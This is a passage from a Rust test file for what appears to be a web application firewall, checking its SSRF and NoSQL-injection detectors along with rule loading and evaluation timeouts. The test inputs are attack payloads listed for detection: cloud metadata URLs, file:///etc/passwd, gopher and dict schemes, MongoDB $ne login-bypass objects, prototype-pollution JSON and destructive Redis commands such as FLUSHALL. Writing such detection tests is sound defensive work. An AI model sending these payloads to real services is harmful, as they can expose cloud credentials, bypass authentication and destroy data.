assert!(
ssrf_analyzer_score("https://127.255.255.255:8080/") > 0,
"Should detect 127.x.x.x"
);
assert!(
ssrf_analyzer_score("http://[::1]/") > 0,
"Should detect ::1"
);
assert!(
ssrf_analyzer_score("http://[0:0:0:0:0:0:0:1]/") > 0,
"Should detect full IPv6 localhost"
);
}
#[test]
fn test_ssrf_analyzer_cloud_metadata() {
assert!(
ssrf_analyzer_score("http://169.254.169.254/latest/meta-data/") > 0,
"Should detect AWS metadata endpoint"
);
assert!(
ssrf_analyzer_score("http://169.254.170.2/v2/credentials") > 0,
"Should detect AWS ECS metadata"
);
assert!(
ssrf_analyzer_score("http://metadata.google.internal/") > 0,
"Should detect GCP metadata hostname"
);
assert!(
ssrf_analyzer_score("http://metadata.azure.com/") > 0,
"Should detect Azure metadata hostname"
);
}
#[test]
fn test_ssrf_analyzer_private_ips() {
assert!(
ssrf_analyzer_score("http://10.0.0.1/internal") > 0,
"Should detect 10.x.x.x"
);
assert!(
ssrf_analyzer_score("http://10.255.255.255/") > 0,
"Should detect 10.255.255.255"
);
assert!(
ssrf_analyzer_score("http://192.168.1.1/") > 0,
"Should detect 192.168.x.x"
);
assert!(
ssrf_analyzer_score("http://192.168.0.254:3000/") > 0,
"Should detect with port"
);
assert!(
ssrf_analyzer_score("http://172.16.0.1/") > 0,
"Should detect 172.16.x.x"
);
assert!(
ssrf_analyzer_score("http://172.31.255.255/") > 0,
"Should detect 172.31.x.x"
);
}
#[test]
fn test_ssrf_analyzer_dangerous_schemes() {
assert!(
ssrf_analyzer_score("file:///etc/passwd") > 0,
"Should detect file://"
);
assert!(
ssrf_analyzer_score("gopher://internal:1234/") > 0,
"Should detect gopher://"
);
assert!(
ssrf_analyzer_score("dict://localhost:11211/") > 0,
"Should detect dict://"
);
assert!(
ssrf_analyzer_score("ldap://internal/") > 0,
"Should detect ldap://"
);
assert!(
ssrf_analyzer_score("expect://id") > 0,
"Should detect expect://"
);
assert!(
ssrf_analyzer_score("php://filter/convert.base64-encode") > 0,
"Should detect php://"
);
assert!(
ssrf_analyzer_score("data:text/html,<script>") > 0,
"Should detect data:"
);
}
#[test]
fn test_ssrf_analyzer_ipv6_mapped() {
assert!(
ssrf_analyzer_score("http://[::ffff:127.0.0.1]/") > 0,
"Should detect IPv6-mapped localhost"
);
assert!(
ssrf_analyzer_score("http://[::ffff:192.168.1.1]/") > 0,
"Should detect IPv6-mapped private IP"
);
assert!(
ssrf_analyzer_score("http://[::ffff:169.254.169.254]/") > 0,
"Should detect IPv6-mapped metadata"
);
}
#[test]
fn test_ssrf_analyzer_encoded_ip() {
assert!(
ssrf_analyzer_score("http://2130706433/") > 0,
"Should detect decimal IP (127.0.0.1)"
);
assert!(
ssrf_analyzer_score("http://0x7f000001/") > 0,
"Should detect hex IP (127.0.0.1)"
);
}
#[test]
fn test_ssrf_analyzer_url_encoded() {
assert!(
ssrf_analyzer_score("http%3a%2f%2f127.0.0.1%2f") > 0,
"Should detect URL-encoded SSRF"
);
assert!(
ssrf_analyzer_score("http%253a%252f%252f127.0.0.1") > 0,
"Should detect double-encoded SSRF"
);
}
#[test]
fn test_ssrf_analyzer_false_positives() {
assert!(
ssrf_analyzer_score("http://8.8.8.8/") == 0,
"Should not flag public IP"
);
assert!(
ssrf_analyzer_score("https://google.com/") == 0,
"Should not flag domain"
);
assert!(
ssrf_analyzer_score("http://example.com/api/data") == 0,
"Should not flag normal URL"
);
assert!(
ssrf_analyzer_score("user submitted text") == 0,
"Should not flag normal text"
);
assert!(
ssrf_analyzer_score("192.168.1.1 is a private IP") == 0,
"Should not flag IP without URL context"
);
}
#[test]
fn test_nosql_analyzer_mongo_operators() {
assert!(
nosql_analyzer_score(r#"{"username": {"$ne": null}}"#) > 0,
"Should detect $ne operator"
);
assert!(
nosql_analyzer_score(r#"{"age": {"$gt": 18}}"#) > 0,
"Should detect $gt operator"
);
assert!(
nosql_analyzer_score(r#"{"name": {"$regex": ".*"}}"#) > 0,
"Should detect $regex operator"
);
assert!(
nosql_analyzer_score(r#"{"$or": [{"a": 1}, {"b": 2}]}"#) > 0,
"Should detect $or operator"
);
}
#[test]
fn test_nosql_analyzer_where_js() {
assert!(
nosql_analyzer_score(r#"{"$where": "function() { return true; }"}"#) > 0,
"Should detect $where with function"
);
assert!(
nosql_analyzer_score(r#"{"$where": "this.password == 'test'"}"#) > 0,
"Should detect $where with this keyword"
);
assert!(
nosql_analyzer_score(r#"{"$where": "sleep(5000)"}"#) > 0,
"Should detect $where with sleep (DoS)"
);
}
#[test]
fn test_nosql_analyzer_auth_bypass() {
assert!(
nosql_analyzer_score(r#"{"password": {"$ne": ""}}"#) > 0,
"Should detect password $ne bypass"
);
assert!(
nosql_analyzer_score(r#"{"username": "admin", "password": {"$gt": ""}}"#) > 0,
"Should detect password $gt bypass"
);
assert!(
nosql_analyzer_score(r#"{"user": {"$exists": true}}"#) > 0,
"Should detect user $exists bypass"
);
}
#[test]
fn test_nosql_analyzer_proto_pollution() {
assert!(
nosql_analyzer_score(r#"{"__proto__": {"isAdmin": true}}"#) > 0,
"Should detect __proto__ pollution"
);
assert!(
nosql_analyzer_score(r#"{"constructor": {"prototype": {}}}"#) > 0,
"Should detect constructor pollution"
);
assert!(
nosql_analyzer_score(r#"{"prototype": {"polluted": true}}"#) > 0,
"Should detect direct prototype pollution"
);
}
#[test]
fn test_nosql_analyzer_couchdb() {
assert!(
nosql_analyzer_score("/_all_docs") > 0,
"Should detect _all_docs endpoint"
);
assert!(
nosql_analyzer_score("/_design/mydesign/_view/myview") > 0,
"Should detect _design/_view endpoints"
);
assert!(
nosql_analyzer_score("/_changes?since=0") > 0,
"Should detect _changes endpoint"
);
}
#[test]
fn test_nosql_analyzer_redis() {
assert!(
nosql_analyzer_score("EVAL \"return 1\" 0") > 0,
"Should detect EVAL command"
);
assert!(
nosql_analyzer_score("FLUSHALL") > 0,
"Should detect FLUSHALL command"
);
assert!(
nosql_analyzer_score("CONFIG SET dir /tmp") > 0,
"Should detect CONFIG command"
);
assert!(
nosql_analyzer_score("KEYS *") > 0,
"Should detect KEYS command"
);
}
#[test]
fn test_nosql_analyzer_url_encoded() {
assert!(
nosql_analyzer_score("%22%24where%22%3A") > 0,
"Should detect URL-encoded \"$where\":"
);
assert!(
nosql_analyzer_score("%7B%22password%22%3A%7B%22%24ne%22%3A%22%22%7D%7D") > 0,
"Should detect URL-encoded password $ne bypass"
);
assert!(
nosql_analyzer_score("%22__proto__%22%3A") > 0,
"Should detect URL-encoded __proto__"
);
}
#[test]
fn test_nosql_analyzer_false_positives() {
assert!(
nosql_analyzer_score(r#"{"name": "John", "age": 30}"#) == 0,
"Should not flag normal JSON"
);
assert!(
nosql_analyzer_score(r#"{"status": "active"}"#) == 0,
"Should not flag simple key-value"
);
assert!(
nosql_analyzer_score("hello world") == 0,
"Should not flag normal text"
);
assert!(
nosql_analyzer_score("user@example.com") == 0,
"Should not flag email"
);
}
#[test]
fn test_header_evaluation() {
let mut engine = Engine::empty();
let rules = r#"[
{
"id": 1,
"description": "Block bad user-agent",
"risk": 10.0,
"blocking": true,
"matches": [
{"type": "header", "field": "User-Agent", "match": {"type": "contains", "match": "bad-bot"}}
]
}
]"#;
engine.load_rules(rules.as_bytes()).unwrap();
let verdict = engine.analyze(&Request {
method: "GET",
path: "/",
headers: vec![Header::new("User-Agent", "bad-bot/1.0")],
..Default::default()
});
assert_eq!(verdict.action, Action::Block);
assert!(verdict.matched_rules.contains(&1));
}
#[test]
fn test_analyze_safe_basic() {
let mut engine = Engine::empty();
let rules = r#"[
{
"id": 1,
"description": "Simple match",
"risk": 10.0,
"matches": [{"type": "uri", "match": {"type": "contains", "match": "test"}}]
}
]"#;
engine.load_rules(rules.as_bytes()).unwrap();
let verdict = engine.analyze_safe(&Request {
method: "GET",
path: "/test",
..Default::default()
});
assert!(!verdict.timed_out);
assert!(verdict.rules_evaluated.is_none());
assert!(verdict.matched_rules.contains(&1));
}
#[test]
fn test_analyze_with_timeout_custom() {
let mut engine = Engine::empty();
let rules = r#"[
{
"id": 1,
"description": "Simple match",
"risk": 10.0,
"matches": [{"type": "uri", "match": {"type": "contains", "match": "test"}}]
}
]"#;
engine.load_rules(rules.as_bytes()).unwrap();
let verdict = engine.analyze_with_timeout(
&Request {
method: "GET",
path: "/test",
..Default::default()
},
Duration::from_millis(100),
);
assert!(!verdict.timed_out);
}
#[test]
fn test_timeout_cap() {
assert!(MAX_EVAL_TIMEOUT >= DEFAULT_EVAL_TIMEOUT);
assert!(MAX_EVAL_TIMEOUT <= Duration::from_secs(1)); }
#[test]
fn test_verdict_timeout_fields_default() {
let verdict = Verdict::default();
assert!(!verdict.timed_out);
assert!(verdict.rules_evaluated.is_none());
}
#[test]
fn test_eval_context_deadline() {
let req = Request {
method: "GET",
path: "/test",
..Default::default()
};
let ctx = EvalContext::from_request(&req);
assert!(ctx.deadline.is_none());
assert!(!ctx.is_deadline_exceeded());
let future_deadline = Instant::now() + Duration::from_secs(10);
let ctx_with_deadline = EvalContext::from_request_with_deadline(&req, future_deadline);
assert!(ctx_with_deadline.deadline.is_some());
assert!(!ctx_with_deadline.is_deadline_exceeded());
let past_deadline = Instant::now() - Duration::from_millis(1);
let ctx_expired = EvalContext::from_request_with_deadline(&req, past_deadline);
assert!(ctx_expired.is_deadline_exceeded());
}
#[test]
fn test_load_rules_regex_error() {
let mut engine = Engine::empty();
let rules = r#"[
{
"id": 1,
"description": "Invalid regex",
"risk": 10.0,
"matches": [
{
"type": "uri",
"match": {
"type": "regex",
"match": "["
}
}
]
}
]"#;
let result = engine.load_rules(rules.as_bytes());
assert!(result.is_err());
match result {
Err(WafError::RegexError(msg)) => assert!(msg.contains("[")),
_ => panic!("Expected RegexError, got {:?}", result),
}
}
}